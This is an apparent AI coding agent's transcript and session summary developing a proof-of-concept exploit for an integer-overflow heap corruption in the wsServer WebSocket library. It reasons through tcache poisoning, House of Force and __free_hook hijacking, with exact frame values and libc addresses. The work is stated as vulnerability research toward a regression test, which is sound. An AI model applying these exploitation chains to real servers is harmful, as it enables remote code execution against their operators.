  1. Heap corruption (proven)
  2. Write arbitrary data past the buffer (proven)

The actual RIP control requires either:

  • A subsequent malloc that returns a controlled address (needs tcache/fastbin/bin poisoning)
  • A subsequent use of a corrupted function pointer (needs function pointers on the heap)
  • An immediate crash at a controlled address during free()

For option 3: can we make free() jump to a controlled address?

On glibc 2.31, free() checks __free_hook first:

```c
void (*hook) (void *, const void *) = atomic_forced_read (__free_hook);
if (__builtin_expect (hook != NULL, 0))
{
    (*hook)(p, RETURN_ADDRESS (0));
    return;
}
```

If __free_hook is non-NULL, free() calls it. But __free_hook starts as NULL and we can't write to it from the heap.

Unless... we can find a way to make free() itself crash at a controlled RIP. For example, if the chunk being freed has a corrupted fd pointer, and tcache_put writes to e->key:

```c
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  e->key = tcache;
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}
```

tcache_put writes to e->key and e->next. If e (the chunk being freed) is at a controlled address... but e is msg_data, which is a heap address. We can't control where e points.

Hmm, what about tcache->entries[tc_idx]? tcache is T1's tcache_perthread_struct. We can't corrupt it.

OK, I think the real answer here is that we need to be smarter about the heap layout.

Let me reconsider the two-connection approach, but this time focusing on what happens when T2 allocates from the arena (not tcache).

When T2's tcache is empty for a given bin, malloc checks:

  1. Fastbins (per-arena)
  2. Small/large bins (per-arena)
  3. Unsorted bin (per-arena)
  4. Top chunk

If T1's overflow corrupts the TOP CHUNK's size field, then when T2 allocates from top, the corrupted size might cause issues.

Actually, that's an interesting idea! What if we corrupt the top chunk?

From the previous GDB run, the chunk after msg WAS the top chunk. If we corrupt the top chunk's size, then when T2 allocates from top:

  • malloc calls _int_malloc → checks bins → falls through to top
  • Splits the top chunk. If the top chunk's size is corrupted to a very large value, the split succeeds but the remainder's size overflows.
  • Or if the size is corrupted to a small value, the top chunk appears too small, and malloc tries to extend the heap via sbrk or mmap.

But corrupting the top chunk to what value? And how does this give us RIP control?

Actually, there's a well-known technique called House of Force: corrupt the top chunk's size to a very large value (like 0xFFFFFFFFFFFFFFFF). Then any large malloc will succeed and return an address calculated from top + requested_size. If we request a specific size, we can make malloc return an arbitrary address. (Caveat to verify: glibc 2.29 added a top-size sanity check in _int_malloc that aborts with "malloc(): corrupted top size" when top's size exceeds av->system_mem, so on glibc 2.31 a size of -1 would likely abort on the next allocation; the corrupted size may need to stay within system_mem.)

But House of Force requires:

  1. Overflow into the top chunk's size field ✓ (we can do this!)
  2. A malloc with a controlled size (we control the message size)
  3. The ability to write to the returned address and then use it

Let me trace this:

  1. On connection 1, overflow corrupts the top chunk's size to 0xFFFFFFFFFFFFFFFF

  2. Connection 1's thread exits

  3. Connection 2 starts, same arena (top chunk is still corrupted)

  4. Connection 2's handshake: first malloc is calloc(1, 61). T2's tcache empty → top. Since top's size is huge, malloc(64) splits top and returns a chunk. But where?

    • victim = top (the top chunk)
    • size = chunksize(victim) = 0xFFFFFFFFFFFFFFFF
    • remainder_size = size - nb (nb = 0x50 for malloc(64))
    • remainder = victim + nb
    • New top = remainder
    • Return victim
    This works fine, returning a chunk from the old top.
  5. Subsequent mallocs on T2 also split from the corrupted top. Eventually, the top pointer wraps around the address space...

Hmm, this doesn't directly give us a chunk at __free_hook. For that, we'd need:

  • Target address for malloc return = &__free_hook - 0x10 (to account for chunk header)
  • Current top = old_top (known, fixed address)
  • malloc size = &__free_hook - 0x10 - old_top - 0x10 = &__free_hook - old_top - 0x20
  • This needs to be a positive, very large number

Actually, House of Force works like this:

  1. Corrupt top_chunk->size to -1 (0xFFFFFFFFFFFFFFFF)
  2. Make a malloc of size delta = target - old_top - chunk_header
  3. The new top becomes old_top + delta = target
  4. Next malloc returns a chunk at target

For our case:

  • target = &__free_hook - sizeof(chunk_header) = 0x7ffff7f9de48 - 16 = 0x7ffff7f9de38
  • old_top = address of the top chunk (known from GDB: 0x7ffff0000c60 + 0x25 aligned... wait, let me recalculate)

From GDB: msg chunk at 0x7ffff0000c60, size 0x25 (which is 0x20 | PREV_INUSE | NON_MAIN_ARENA = 32 with flags). Wait, 0x25 = 37? That doesn't make sense for a chunk size.

Oh wait, I think the GDB output showed the raw chunk metadata. Let me re-read: "chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)". But 0x25 = 37, not 32. Hmm. 0x20 = 32. 0x21 = 33. 0x25 = 37.

Actually, the chunk size field includes flags in the low 3 bits: 0x25 = 0b100101. The actual size is 0x25 & ~7 = 0x20 = 32. Flags: PREV_INUSE (bit 0 = 1), NON_MAIN_ARENA (bit 2 = 1).

So the chunk is 32 bytes (user data: 16 bytes). For f1sz=16, the msg is 16 bytes, fitting exactly in a 32-byte chunk.

The next chunk (top chunk) starts at 0x7ffff0000c60 + 0x20 = 0x7ffff0000c80. From GDB, the corrupted area at 0x7ffff0000c80 had prev_size=0, size=0x21, fd=0x4141... So the top chunk was at 0x7ffff0000c80 and its size was 0x21 & ~7 = 0x20 = 32.

Wait, the top chunk should be very large (the remaining heap space). A size of 0x20 seems too small. Unless the heap was very small.

Actually, for a thread arena created via mmap, the initial heap size is typically 1MB or so. The top chunk should be large. A size of 0x20 (32 bytes) doesn't make sense for the top chunk.

Hmm, maybe the GDB output was showing the corrupted state AFTER the overflow? The original top chunk's size was overwritten by our overflow data. We wrote a fake chunk pattern with size=0x21. That's the corrupted value, not the original.

So the original top chunk was at 0x7ffff0000c80 with some large size. We overwrote it with our pattern (prev_size=0, size=0x21, fd=0x4141...).

This is perfect for House of Force!

Instead of writing a fake chunk pattern, we should write:

  • Overwrite the top chunk's size with 0xFFFFFFFFFFFFFFFF (-1 in signed)

Then on the next connection (T2), we can use House of Force to get a chunk at __free_hook.

Here's the refined plan:

  1. Connection 1 (thread T1): Overflow into the top chunk, set its size to -1
  2. Connection 1 exits: Arena persists with corrupted top chunk
  3. Connection 2 (thread T2): Same arena, top chunk is corrupted
  4. Connection 2 handshake: Multiple mallocs from the corrupted top. The first few succeed normally (splitting from the huge top).
  5. Connection 2 message: Send a message whose size is calculated to make malloc return a chunk at __free_hook - 16

But wait, the handshake happens before we can control anything. The handshake does malloc(61), malloc(31), malloc(130). These all come from the corrupted top chunk. After the handshake, top has advanced by 64 + 48 + 144 = 256 bytes (approximately). Then we send a message whose size causes the echo's malloc to return __free_hook.

Actually, the echo response malloc is: malloc(2 + msg_size + 1). We control msg_size. We want malloc to return __free_hook.

For House of Force:

  • After handshake, top is at old_top + 256 (approximately)
  • We want to malloc such that the returned chunk is at __free_hook - 16
  • Size needed: (__free_hook - 16) - top_after_handshake - 16

But this size might be negative (if __free_hook is before the top). In that case, on glibc 2.31 x86_64, unsigned arithmetic wraps around, and top + huge_size wraps to the target.

Wait, but malloc checks size < remainder_size. If the top chunk's size is 0xFFFFFFFFFFFFFFFF and we request a huge size, nb = request2size(huge_size). The check is nb < remainder_size = nb < 0xFFFFFFFFFFFFFFFF. For any reasonable nb, this passes. But nb could wrap around...

Actually, the malloc code does:

```c
if (nb < old_size) {
    new_size = old_size - nb;
    ...
}
```

Where old_size = 0xFFFFFFFFFFFFFFFF. For nb up to 0xFFFFFFFFFFFFFFFE, this passes. And new_size = 0xFFFFFFFFFFFFFFFF - nb.

But the new top is at old_end + nb (where old_end = old_top + old_size). With old_size = -1:

  • old_end = old_top + 0xFFFFFFFFFFFFFFFF = old_top - 1 (wraps around!)
  • new_top = old_end + nb = old_top - 1 + nb

For the next malloc, it returns the new top. So:

  • First big malloc: returns old_top, advances top by nb1
  • Second malloc: returns new_top = old_top + nb1

To get a chunk at __free_hook:

  • We need old_top + nb1 = &__free_hook - sizeof(header)
  • nb1 = &__free_hook - sizeof(header) - old_top

This could be a very large (or negative) value. But we need to malloc this size. The request size would be nb1 - 2*SIZE_SZ (approximately).

Hmm, but we also need to consider that the malloc for the response has to come from this specific path. Let me trace more carefully.

Actually, for House of Force, we typically do ONE large allocation to move the top to the target, then the NEXT allocation returns the target.

But in our case, the path is:

  1. Corrupt top size on T1
  2. T1 exits
  3. T2 starts, gets same arena
  4. T2's handshake: several mallocs from top. Each one advances top by the chunk size.
  5. T2's message processing: malloc(msg_size) for msg, malloc(response_size) for echo response

We want one of these mallocs to return __free_hook. We'd need to calculate the exact distance from the current top (after handshake mallocs) to __free_hook.

This requires knowing:

  • The exact address of the top chunk after corruption (known from GDB)
  • The exact sizes of all mallocs in the handshake (known: 576 + 64 + 48 + 144 = 832, approximately)
  • The target address: &__free_hook - 16

Let me calculate:

  • Top chunk was at 0x7ffff0000c80 (from GDB)
  • After corrupting its size to -1, any malloc from top will work
  • T2's first malloc: tcache_init → malloc(576) → chunk of ~592 bytes from top
    • New top: 0x7ffff0000c80 + 592 = 0x7ffff0000ed0
  • T2's handshake calloc(1, 61): malloc(61) → 64-byte chunk from top
    • New top: 0x7ffff0000ed0 + 64 = 0x7ffff0000f10
  • T2's handshake base64_encode: malloc(31) → 48-byte chunk from top
    • New top: 0x7ffff0000f10 + 48 = 0x7ffff0000f40
  • T2's handshake malloc(130): → 144-byte chunk from top
    • New top: 0x7ffff0000f40 + 144 = 0x7ffff0000fd0
  • T2's handshake frees: accept → tcache[1], str → tcache[2], response → tcache[7]
    • These don't affect top

Now T2 sends a message. msg_size needs to be chosen so that the echo response malloc returns __free_hook.

Actually, let me reconsider. For House of Force, the key is to make ONE large allocation that moves the top pointer to right before __free_hook. Then the NEXT allocation returns a chunk at __free_hook.

But in our case, the first "user-controlled" malloc on T2 is the msg allocation in read_single_frame. We can make this a specific size. Then the echo response allocation follows.

If msg allocation moves top to right before __free_hook:

  • msg_size such that request2size(msg_size) = &__free_hook - 16 - current_top
  • Then echo response: malloc(2 + msg_size + 1) → returns chunk at __free_hook

But wait, &__free_hook - 16 - current_top might be negative (if __free_hook is before current_top). In that case, request2size would wrap around.

  • current_top ≈ 0x7ffff0000fd0 (from the calculation above)
  • &__free_hook - 16 = 0x7ffff7f9de38
  • &__free_hook - 16 - current_top = 0x7ffff7f9de38 - 0x7ffff0000fd0 = 0x7f9ce68 ≈ 128MB

So we'd need a ~128MB allocation. That's request2size(0x7f9ce68) = 0x7f9ce70. Can we send a message with this size? The msg allocation is malloc(f1sz) where f1sz is the frame 1 payload size. For a non-FIN frame, f1sz can be up to... well, the server reads from the socket using next_byte(). The maximum read per call is MESSAGE_LENGTH=2048. So the message payload is limited to 2048 bytes in practice.

Wait, no. The msg allocation is realloc(msg, *msg_idx + frame_length + is_fin). For frame 1 (non-FIN), msg_idx = 0, frame_length = f1sz, is_fin = 0. So malloc(f1sz). f1sz is the payload length in the WebSocket frame, which can be up to 2^64 in theory but limited by the socket data.

But read_single_frame reads the payload byte by byte from the socket. To fill a ~128MB message, we'd need to send ~128MB of data, and the MAX_FRAME_LENGTH check caps frame_size at 16MB anyway. That's not practical for a PoC.

So House of Force requires too large an allocation.

But wait - we don't need to use the msg allocation for the large jump. We can use the ECHO RESPONSE allocation.

Hmm, but we don't control the echo response's allocation directly. The echo response size is 2 + msg_size + 1. And msg_size is what we send.

The issue is the same: we need a large allocation to make the jump from the heap to libc.

OK so House of Force requires a large allocation, which we can't do through the echo server.

Revised House of Force: Use a NEGATIVE distance

What if the top chunk is BEFORE __free_hook in memory? It is: 0x7ffff0000fd0 < 0x7ffff7f9de38. The distance is positive (~128MB).

What if we go the other way? What if we make top wrap around to __free_hook?

top + 0xFFFFFFFFFFFFFFFF + 1 = top (wraps to same). top + huge_value wraps around. If top + huge_value ≡ &__free_hook (mod 2^64), then huge_value = &__free_hook - top.

huge_value = 0x7ffff7f9de38 - 0x7ffff0000fd0 = 0x7f9ce68 ≈ 128MB.

This is the same calculation. We need to malloc ~128MB. Not practical.

OK so House of Force is out because the heap and libc are too far apart.

What if the heap and libc are closer?

On some systems, the heap is near libc. But on modern Linux, the heap (via mmap for thread arenas) is at a random address (though we disabled ASLR, the addresses are still "random" in the sense that they depend on the mmap layout).

Wait, we disabled ASLR. So the addresses are deterministic. But the heap and libc are still far apart in the address space.

Let me check: thread arena heap is at 0x7ffff0000000 (from GDB: chunk at 0x7ffff0000c60). Libc is mapped at 0x7ffff7dxxxxx (from GDB: system at 0x7ffff7e01290). The distance is 0x7ffff7e01290 - 0x7ffff0000c60 = 0x7e00630 ≈ 126MB, far beyond the 16MB MAX_FRAME_LENGTH cap. Way too far.

OK, I think I need to accept that with this specific setup (thread arenas, far from libc), we can't directly use House of Force.

Let me reconsider the problem from scratch.

Key constraint: The echo server processes each connection in a separate thread. Each thread has its own tcache. After the overflow, the thread exits without doing any more mallocs.

Possible approaches:

  1. Find a way to affect another thread's tcache or the arena's bins
  2. Find a way to make the same thread do more mallocs after the overflow
  3. Find a completely different exploitation path

For approach 2: What if we use a valid multi-frame message where the overflow happens on a MIDDLE frame, not the last one?

For example: [Frame 1: non-FIN BIN, 16 bytes] [Frame 2: non-FIN CONT, overflow] [Frame 3: FIN CONT, small]

Wait, but frame 2's write loop will try to read ~2^64 bytes and fail. Unless frame 2 has a small frame_length that still causes an overflow.

For an overflow, we need f1sz + frame_length_2 > actual_buffer_size. The buffer was allocated with realloc(NULL, f1sz) = malloc(f1sz). The chunk has request2size(f1sz) bytes of space. If f1sz + frame_length_2 > request2size(f1sz), there's an overflow.

But frame_size = f1sz + frame_length_2. For this to pass the check, frame_size ≤ 16MB. So f1sz + frame_length_2 ≤ 16MB. And for overflow: f1sz + frame_length_2 > request2size(f1sz).

request2size(f1sz) ≈ f1sz + 16 (for small f1sz). So f1sz + frame_length_2 > f1sz + 16 → frame_length_2 > 16.

Wait, this doesn't work because frame_size = f1sz + frame_length_2 is checked. If frame_length_2 > 16, then frame_size > f1sz + 16 ≈ request2size(f1sz). But frame_size ≤ 16MB, and request2size(f1sz) ≈ f1sz + 16. So we'd be overflowing by frame_length_2 - 16 bytes. This is a SMALL overflow!

But does the realloc resize the buffer? realloc(msg, msg_idx + frame_length_2 + is_fin). For frame 2 (non-FIN CONT), msg_idx = f1sz, frame_length_2 = desired, is_fin = 0. So realloc(msg, f1sz + frame_length_2). Since f1sz + frame_length_2 = frame_size ≤ 16MB, this is a legitimate realloc! It would GROW the buffer to fit. No overflow.

OH. The realloc only underflows when the SIZE wraps around due to the integer overflow. Without wrapping, it's a legitimate allocation that fits the data. The overflow only happens because the realloc size wraps to a tiny value, while the write loop uses the original (huge) frame_length.

So the integer overflow in *frame_size += frame_length is ESSENTIAL. Without it, there's no overflow. And with it, the frame_length is ~2^64, making the write loop infeasible to complete.

This means the write loop ALWAYS fails after writing some bytes (our overflow), and the thread ALWAYS errors out.

Given this fundamental constraint, let me think about what CAN be achieved.

The overflow writes some bytes past the buffer. On the same thread, the only thing that happens after is free(msg_data). We need free(msg_data) to somehow trigger RIP control.

For free(msg_data):

  1. Check tcache: if room, tcache_put and return. No crash.
  2. If tcache full: _int_free, which does more checks.

On T1, tcache[1] (for 48-byte chunks) has at most 2 entries. So tcache is never full. free() always goes to tcache. No crash.

What if we make the chunk size indicate a DIFFERENT bin that has a full tcache?

We can't change the chunk's size (it's before the buffer in memory).

What if we use a different f1sz that results in a larger chunk, and we've filled tcache for that bin through shaping?

If we use f1sz = 97 (0x70 chunk), and we've done 4 shaping messages of 97 bytes:

  • tcache[5] has 2 entries (max for single connection)

Same problem. tcache never fills past 2.

Wait, what if we use MULTIPLE DIFFERENT sizes for shaping to fill tcache for a specific bin?

Actually, the issue is that each echo round-trip produces exactly 2 frees for the same bin. We can't accumulate more.

Unless... we DON'T drain the echo responses! If we send messages faster than we read responses, the server's send buffer fills up and SEND() blocks. Then the onmessage thread is stuck in ws_sendframe_internal, holding the response buffer. The msg buffer has already been freed.

Wait, let me re-read the code:

```c
/* ws_establishconnection, line 1752 */
while (next_complete_frame(&wfd) >= 0)
{
    if ((wfd.frame_type == WS_FR_OP_TXT ||
        wfd.frame_type == WS_FR_OP_BIN) && !wfd.error)
    {
        client->ws_srv.evs.onmessage(...);
    }
    /* ... */
    free(wfd.msg);  /* Line 1781 */
}
```

onmessage is called, which does ws_sendframe_bcast → ws_sendframe_internal. In ws_sendframe_internal, the response is allocated, sent, and freed. Then control returns to onmessage, which returns. Then free(wfd.msg) is called.

If SEND blocks (because the client's recv buffer is full), the response stays allocated. The thread is blocked. Meanwhile, the next message can't be processed because we're still in onmessage.

So on a single connection, we can only have ONE outstanding response at a time. We can't accumulate free chunks.

Unless... we use BROADCAST to multiple connections! ws_sendframe_bcast sends to ALL clients on port 8080. If we have connections A, B, C all connected, a message on A triggers a broadcast to A, B, C. Each broadcast allocates ONE response buffer, sends to all, then frees it. So still only one extra allocation.

Hmm. What about ws_sendframe_bin_bcast? Same thing - one allocation per call.

OK, I'm now fairly convinced that with the current echo server architecture, we can't fill tcache beyond 2 entries per bin on a single thread, and we can't get chunks into fastbins.

But wait - what about printf?

The printf in onopen and onmessage may allocate a buffer for stdout. On the first call, printf allocates a buffer (typically 8192 bytes or the block size of the output). This is a large allocation that goes to a large bin or unsorted bin.

But this is a one-time allocation. It doesn't free or accumulate.

What about the tcache_init allocation?

When T1's first malloc triggers tcache_init, it allocates a 576-byte chunk for the tcache_perthread_struct. This is a 592-byte chunk (or similar). It's allocated once and never freed.

This doesn't help with tcache filling.

OK, I'm going to take a completely different approach. Let me reconsider whether T1 and T2 might share the same t

zai-coding-plan
zai-coding-plan / glm-5-turbo
Step

Goal

Create a security PoC that proves RIP register manipulation via an integer-overflow heap overwrite vulnerability in the wsServer C library. The user is a co-creator of wsServer and discovered this vulnerability. The ultimate goal is a regression test, but the immediate step is a network-based exploration PoC demonstrating RIP control on a server built with all compiler protections disabled.

Instructions

  • The PoC must be network-based (connects to a running wsServer instance over TCP, not file-based via ws_file).
  • The server must be built with all protections disabled: no ASLR, no PIE, no stack canary, no RELRO, no NX, no FORTIFY_SOURCE.
  • The target environment is a Docker container running Ubuntu 20.04 (glibc 2.31) because the host system has glibc 2.39 (which removed __free_hook, has safe-linking, and tcache key validation — too complex for a PoC).
  • Follow the repo's coding style: tabs, Allman braces, 85-col limit, C89 comments only (/* */), Doxygen for functions/structs.
  • Honor existing AGENTS.md conventions.

Discoveries

Vulnerability Details (confirmed by code review + GDB)

  • Location: read_single_frame() in src/ws.c:1410-1552
  • Line 1453: *frame_size += fsd->frame_length — unchecked 64-bit addition, wraps around
  • Line 1463: if (*frame_size > MAX_FRAME_LENGTH) — check is defeated by the wrapped small value
  • Line 1505: realloc(msg, *msg_idx + fsd->frame_length + fsd->is_fin) — allocation size also wraps to ~6 bytes
  • Lines 1519-1527: write loop uses original (huge) fsd->frame_length, writing far past the undersized buffer

Exploit Arithmetic (verified by GDB)

  • Frame 1: non-FIN binary, 16 bytes → sets msg_idx=16, frame_size=16
  • Frame 2: FIN continuation, frame_length = 0xFFFFFFFFFFFFFFF5
  • *frame_size += frame_length → 16 + 0xFFF...F5 wraps to 5 → passes MAX_FRAME_LENGTH check
  • realloc(msg, 16 + 0xFFF...F5 + 1) wraps to 6 → tiny allocation, same pointer returned
  • Write loop starts at msg[16], writing far past the 32-byte chunk boundary → heap corruption confirmed

GDB Reconnaissance Results (from successful run)

  • Libc addresses (no ASLR, fixed):
    • __free_hook = 0x7ffff7f9de48
    • __malloc_hook = 0x7ffff7f9bb70
    • system = 0x7ffff7e01290
    • exit = 0x7ffff7df5a40
  • msg buffer: chunk at 0x7ffff0000c60, size 0x25 (raw; actual size = 0x20 = 32 bytes, with PREV_INUSE | NON_MAIN_ARENA flags), user data at 0x7ffff0000c70
  • Chunk is in a thread arena (NON_MAIN_ARENA flag set) — allocated via mmap, address range 0x7ffff0000000+
  • Write loop error at msg_idx=144 (16 + 128 = 144, matching our 128-byte overflow)
  • Corrupted area confirmed at 0x7ffff0000c80: prev_size=0, size=0x21, fd=0x4141414141414141
  • Server survived: free(msg) goes to tcache BEFORE the next-chunk size check
  • The next chunk after msg is the TOP CHUNK, not a free tcache chunk

Why the Server Survives

On glibc 2.31, free() checks tcache BEFORE checking the next chunk's size:

```c
if (tc_idx < mp_.tcache_bins && tcache && tcache->counts[tc_idx] < mp_.tcache_count) {
    tcache_put(p, tc_idx);
    return;  /* never reaches the corrupted next-chunk check */
}
```

Critical Problem: Per-Thread Tcache Defeats Cross-Thread Tcache Poisoning

This is the central unsolved problem. The most recent analysis (the interrupted reasoning block) exhaustively analyzed why the previously planned tcache poisoning strategy does NOT work:

  1. wsServer creates a new pthread per connection (ws_establishconnection). Connection 1 runs in thread T1, connection 2 in thread T2.
  2. tcache is per-thread on glibc 2.31. Each thread has its own tcache_perthread_struct (576 bytes, allocated as the FIRST chunk on the thread arena heap). T1's poisoned tcache is invisible to T2.
  3. When T1 exits, its tcache entries are "leaked" — the chunks are in the heap but not in any arena-level free list. T2 starts with a fresh, empty tcache.
  4. The echo server architecture prevents filling tcache beyond 2 entries per bin on a single connection. Each echo round-trip does exactly: malloc(msg) → onmessage → malloc(response) → free(response) → free(msg). The tcache count oscillates between 0 and 2, never reaching the capacity of 7.
  5. Because tcache never fills, frees never fall through to fastbins (arena-level, potentially shared between threads that reuse the same arena).
  6. T1 and T2 likely share the same arena (T2 reuses T1's freed arena from the arena free list), but since no chunks reach arena-level bins, this sharing is irrelevant.

Exhaustively Analyzed and Rejected Approaches

The interrupted analysis considered and rejected the following approaches:

  1. Cross-thread tcache poisoning (original plan from previous session) — REJECTED: per-thread tcache, entries leaked on thread exit
  2. Fill tcache → overflow to fastbin — REJECTED: can't fill tcache beyond 2 entries with echo server
  3. Fastbin poisoning to __malloc_hook - 0x23 (classic 0x7f trick) — REJECTED: same tcache-filling problem
  4. House of Force (corrupt top chunk size to -1) — REJECTED: heap (0x7ffff0000000+) is ~128MB away from libc (0x7ffff7d00000+); would require a ~128MB allocation to bridge the gap, not feasible through WebSocket messages (MAX_FRAME_LENGTH caps frames at 16MB)
  5. Overflow into tcache_perthread_struct — REJECTED: struct is the FIRST allocation on the heap (before our buffer); overflow goes forward only
  6. Overflow into arena header (malloc_state) — REJECTED: also at the beginning of the heap
  7. Same-thread exploitation after overflow — REJECTED: after the write loop hits EOF, the only code executed is free(fsd.msg_data) (goes to tcache, no crash) then onclose (no mallocs) then thread exit. No subsequent mallocs on T1.
  8. Unsorted bin attack — REJECTED: same tcache-filling prerequisite
  9. Interleaving PING between exploit frames — REJECTED: PONG allocates+frees on same thread, same tcache bin issue; doesn't create persistent arena-level free chunks
  10. Overflow wrapping msg_idx to write to arbitrary address — REJECTED: would require sending ~2^64 bytes to the socket
  11. Corrupting chunk metadata to crash free() — REJECTED: free() goes to tcache which doesn't check next-chunk metadata

Approaches NOT Yet Fully Analyzed (Potential Avenues)

  1. Overwrite the tcache_perthread_struct of a DIFFERENT thread — T2's tcache struct doesn't exist at overflow time (allocated on T2's first malloc, after T1 exits). BUT: what if T1 and T2 are concurrent (both alive during the overflow)? If T2 is already running when T1 does the overflow, T2's tcache struct IS on the heap and potentially reachable. This requires T2 to be connected before T1 sends the exploit frames.

  2. Use ws_sendframe_bcast to trigger malloc on T2's thread — When T1 sends a message, ws_sendframe_bcast locks a mutex and iterates clients. The malloc(response) happens on T1's thread, not T2's. But if the broadcast SEND blocks (T2's recv buffer full), T1 is stuck holding the response allocation. Not directly useful.

  3. Overflow into T2's tcache_perthread_struct while T2 is alive — If T2 is connected and has done its first malloc (tcache initialized), its tcache struct is on the heap. If we can shape the heap so T2's tcache struct is adjacent to T1's overflow buffer, we can overwrite T2's tcache entries directly, setting entries[X] = &__free_hook and counts[X] = 1. Then T2's next malloc of that size returns &__free_hook. This is promising but requires precise heap layout control across two threads sharing one arena.

  4. Corrupt the top chunk to cause a crash during T2's malloc — Not RIP control, but could demonstrate impact. Less interesting for the PoC.

  5. Use a single-threaded server — If we modify the echo server to use .thread_loop = 1 and process connections sequentially in the main thread, the tcache problem disappears entirely. The main thread uses the main arena. This is the simplest solution but requires changing the test server configuration.

  6. Use the close_client path more carefully — The close_client function destroys mutexes. If a mutex's internal state is corrupted, pthread_mutex_destroy might crash. But this is unreliable.

  7. Target the tcache->entries array of T1's own tcache struct — Even though T1 exits after the overflow, if we could overwrite T1's tcache entries BEFORE the free(msg_data) at line 1713, then free(msg_data) would use the corrupted tcache. But free() checks tcache->entries[tc_idx] to push to, it doesn't pop from it. Overwriting entries doesn't affect tcache_put behavior (it just sets e->next = tcache->entries[tc_idx] and tcache->entries[tc_idx] = e). So corrupting entries before a free just means the freed chunk gets linked to a corrupted list — but nobody pops from that list afterward.

Server Frame Processing Details

  • Server reads via next_byte() which buffers up to MESSAGE_LENGTH=2048 bytes from socket
  • All client frames MUST have MASK bit set (server reads 4 mask bytes unconditionally)
  • Binary frames (opcode 2) skip UTF-8 validation — use these for shaping and exploit
  • The overflow happens in read_single_frame BEFORE validate_utf8_txt is called
  • Control frames (PING/PONG/CLOSE) are allowed between non-FIN data frames — the opcode check at line 1611-1613 permits them
  • Frame format: byte0 (FIN+RSV+opcode), byte1 (MASK+length), optional extended length, 4-byte mask, payload
  • Extended length for 64-bit: bytes 2-9 are big-endian

Handshake Allocation Details (per connection)

In get_handshake_accept:

  1. calloc(1, 61) → 64-byte chunk → freed to tcache[2] (as str)
  2. base64_encode(hash, 20, NULL)malloc(31) → 48-byte chunk → returned as accept

In get_handshake_response:

  3. malloc(130) → 144-byte chunk → returned as response
  4. free(accept) → 48-byte chunk to tcache[1]

In do_handshake:

  5. free(response) → 144-byte chunk to tcache[7]

Echo Path Allocation Details

For a message of size S bytes:

  • read_single_frame: malloc(S) → chunk of size request2size(S)
  • ws_sendframe_internal: malloc(2 + S + 1) for response (2-byte header for S≤125)
  • Both are freed: free(response) then free(msg)
  • request2size(S) = (S + 8 + 15) & ~15 on glibc 2.31 x86_64

Chunk Size / Tcache Index Reference (glibc 2.31 x86_64)

  • 32-byte chunk → tcache idx 0 (malloc 1-24)
  • 48-byte chunk → tcache idx 1 (malloc 25-40)
  • 64-byte chunk → tcache idx 2 (malloc 41-56)
  • 0x70 (112-byte) chunk → tcache idx 5 (malloc 89-104)
  • tcache capacity: 7 per bin

Heap Layout Notes

  • ws_connection structs are in static client_socks array (BSS), NOT on heap
  • ws_getaddress() returns pointer to client->ip (static buffer), does NOT strdup
  • close_client() only closes socket + destroys mutexes — no malloc/free
  • printf in onopen may allocate stdout buffer once (large, ~8192 bytes, never freed)
  • Thread arena allocated via mmap, heap starts at 0x7ffff0000000 range
  • tcache_perthread_struct (576 bytes → ~592-byte chunk) is the FIRST allocation on the thread arena heap
  • Libc mapped at 0x7ffff7d00000 range — ~126MB from the thread arena heap

Accomplished

Completed

  1. Created AGENTS.md at repo root — compact instruction file for future agent sessions
  2. Created tests/Dockerfile.poc — Ubuntu 20.04 image, builds echo server with all protections disabled
  3. Created tests/poc_rip_control.c — Full PoC client with TCP connect, WebSocket handshake, frame builder, heap shaping, two-frame exploit, two-connection mode, configurable overflow payload
  4. Created tests/poc_gdb.txt — GDB helper script with breakpoints at vulnerable code
  5. Created tests/poc_run.sh — Orchestration script with interactive and auto modes
  6. Built Docker image successfully (ws-poc)
  7. Ran initial reconnaissance — confirmed integer overflow, heap corruption (128 bytes past buffer), server survival via tcache, top chunk as adjacent chunk

In Progress / Blocked

The RIP control strategy is blocked. The previously planned tcache poisoning approach (from the first session's summary) was based on an incorrect assumption that tcache entries persist across threads. The deep analysis in this session conclusively showed that per-thread tcache makes cross-thread poisoning impossible with the echo server's architecture.

Next Steps (Priority Order)

Option A (simplest, recommended): Change the test server to single-threaded mode

  • Modify the echo server build to use .thread_loop = 1, which processes connections sequentially in the main thread
  • The main thread uses the main arena (not a thread arena), and there's only ONE tcache
  • All the original tcache poisoning logic works: overflow corrupts adjacent free chunk's fd → __free_hook, next malloc returns __free_hook, echo writes frame data to it, free(response) triggers __free_hook → RIP control
  • This requires updating Dockerfile.poc to build a single-threaded echo variant

Option B (no server changes, more complex): Concurrent connections + cross-thread tcache struct overwrite

  • Open connection 2 FIRST (so T2's tcache struct is allocated on the shared arena heap)
  • Shape heaps on both connections to place T2's tcache_perthread_struct adjacent to T1's overflow buffer
  • Overflow into T2's tcache struct, overwriting entries[X] with &__free_hook and counts[X] with non-zero
  • Connection 2's next malloc of that size returns &__free_hook
  • This requires very precise heap layout control and may need GDB-assisted discovery of T2's tcache struct address

Option C (no server changes, theoretical): Document the limitation

  • Keep the current PoC demonstrating heap corruption with controlled fd overwrite (0x41414141...)
  • Add a comment explaining that RIP control would require either single-threaded mode or a more complex server with additional allocation patterns
  • Less satisfying but honest

Once an approach is chosen, the implementation steps are:

  1. Update the overflow payload to target the specific exploitation primitive
  2. Update poc_rip_control.c (potentially remove two-connection mode if going single-threaded)
  3. Update poc_gdb.txt with breakpoints to verify the exploitation chain
  4. Rebuild Docker image
  5. Run and verify RIP control crash in GDB (show RIP = 0xXXXXXXXXXXXX2082 or similar controlled value)

Relevant files / directories

Created

  • AGENTS.md — repo instruction file (completed)
  • tests/Dockerfile.poc — Docker build environment (completed, may need update for single-threaded server)
  • tests/poc_rip_control.c — PoC client (completed, needs update for chosen exploitation strategy)
  • tests/poc_gdb.txt — GDB helper script (completed, may need update)
  • tests/poc_run.sh — orchestration script (completed, may need update)

Key existing files read

  • src/ws.c — the vulnerable file, especially:
    • Lines 1410-1552 (read_single_frame): the vulnerable integer overflow
    • Lines 1229-1247 (frame_state_data struct): field offsets
    • Lines 155-193 (ws_frame_data struct): huge struct with frm[2048] buffer
    • Lines 1565-1720 (next_complete_frame): frame dispatch loop, error path at line 1713 does free(fsd.msg_data)
    • Lines 1735-1808 (ws_establishconnection): connection loop, onclose after error, thread per connection
